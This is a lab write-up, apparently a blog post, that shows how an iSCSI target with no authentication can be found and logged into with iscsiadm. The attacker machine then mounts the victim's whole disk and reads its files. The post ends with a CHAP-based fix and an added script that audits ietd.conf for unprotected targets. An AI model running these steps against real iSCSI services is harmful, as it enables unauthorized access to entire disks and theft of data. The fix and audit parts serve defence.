Environment setup

  • Target
    • OS: ubuntu 14.04
    • IP: 192.168.197.135
  • Attacker
    • OS: CentOS 7
    • IP: 192.168.197.136

Configuring the iSCSI server

Install iscsitarget:

# apt-get install iscsitarget

Edit the configuration file /etc/default/iscsitarget:

ISCSITARGET_ENABLE=true
ISCSITARGET_MAX_SLEEP=3


# ietd options
# See ietd(8) for details
ISCSITARGET_OPTIONS=""

Edit the other configuration file, /etc/iet/ietd.conf:

Target iqn.2016-08.ll.test:storage
    Lun 0 Path=/dev/sda,Type=fileio,ScsiId=lun0,ScsiSN=lun0

Then restart the iSCSI service:

# /etc/init.d/iscsitarget restart
* Removing iSCSI enterprise target devices:[ OK ]
* Stopping iSCSI enterprise target service:[ OK ]
* Removing iSCSI enterprise target modules:[ OK ]
* Starting iSCSI enterprise target service:[ OK ]

Testing

First, install the required tools:

sudo yum install epel-release
sudo yum install scsi-target-utils
sudo yum install iscsi-initiator-utils

Next, retrieve the target's IQN. If discovery fails, check whether the iscsid service is running; if it is not, start it with service iscsi start.

$ sudo iscsiadm --mode discovery --type sendtargets --portal 192.168.197.135
192.168.197.135:3260,1 iqn.2016-08.ll.test:storage
172.17.42.1:3260,1 iqn.2016-08.ll.test:storage

Once the IQN has been discovered, log in to the target to attach the disk:

$ sudo iscsiadm -m node -T iqn.2016-08.ll.test:storage -p 192.168.197.135 -l
Logging in to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] (multiple)
Login to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] successful.

Check which device the disk was attached as:

sudo fdisk -l

Disk /dev/sda: 21.5 GB, 21474836480 bytes, 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x0004df07

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048     1026047      512000   83  Linux
/dev/sda2         1026048    41943039    20458496   8e  Linux LVM

Disk /dev/mapper/centos-root: 18.8 GB, 18756927488 bytes, 36634624 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/mapper/centos-swap: 2147 MB, 2147483648 bytes, 4194304 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/sdc: 42.9 GB, 42949672960 bytes, 83886080 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x00023447

   Device Boot      Start         End      Blocks   Id  System
/dev/sdc1   *        2048    79693823    39845888   83  Linux
/dev/sdc2        79695870    83884031     2094081    5  Extended
/dev/sdc5        79695872    83884031     2094080   82  Linux swap / Solaris

Here sdc is the attached Ubuntu disk. Mount it:

# mkdir /tmp/ubuntu
# mount /dev/sdc1 /tmp/ubuntu
# cd /tmp/ubuntu

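The files on the Ubuntu machine are now accessible.
So if you find an iSCSI service on an internal network during a penetration test, it is worth trying to attach it.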

Disconnecting

iscsiadm -m node -u

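Fix

Fixing this vulnerability is also very simple: just add authentication. Note that the password length apparently cannot exceed 12 characters.
Change the configuration file to: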

Target iqn.2016-08.ll.test:storage
    Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1
    incominguser your_username your_password

To connect to a password-protected iSCSI target, the credentials must first be configured in /etc/iscsi/iscsid.conf.
To connect to an iSCSI service from Ubuntu, install open-iscsi and open-iscsi-utils.
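
An added example, not part of the original post: a shell function that audits an ietd.conf and reports every Target block that lacks the incominguser line shown in the fix above. The function name audit_ietd_conf and the second target name in the sample are assumptions; the sample config is constructed from the page's two snippets.

```shell
#!/bin/sh
# audit_ietd_conf FILE  (hypothetical helper name)
# Prints "<iqn> CHAP" or "<iqn> NO-AUTH" for each Target block.
# Returns 1 if any target has no IncomingUser of its own.
audit_ietd_conf() {
    awk '
    function report() {
        if (target == "") return
        if (auth) print target, "CHAP"
        else { print target, "NO-AUTH"; bad = 1 }
    }
    { sub(/#.*/, "") }          # drop comments
    NF == 0 { next }            # skip blank lines
    tolower($1) == "target" { report(); target = $2; auth = 0; next }
    # A global IncomingUser (before the first Target) covers discovery
    # sessions only, so it is not counted as protecting a target.
    tolower($1) == "incominguser" && target != "" && NF >= 3 { auth = 1 }
    END { report(); exit bad }
    ' "$1"
}

# Constructed sample: the unauthenticated target from the setup section
# next to a second, made-up target carrying the fix.
sample=$(mktemp)
cat > "$sample" <<'EOF'
Target iqn.2016-08.ll.test:storage
    Lun 0 Path=/dev/sda,Type=fileio,ScsiId=lun0,ScsiSN=lun0
Target iqn.2016-08.ll.test:fixed
    Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1
    incominguser your_username your_password
EOF
audit_ietd_conf "$sample" || echo "at least one target accepts logins without CHAP"
rm -f "$sample"
```

On a real server, run it against /etc/iet/ietd.conf after every configuration change.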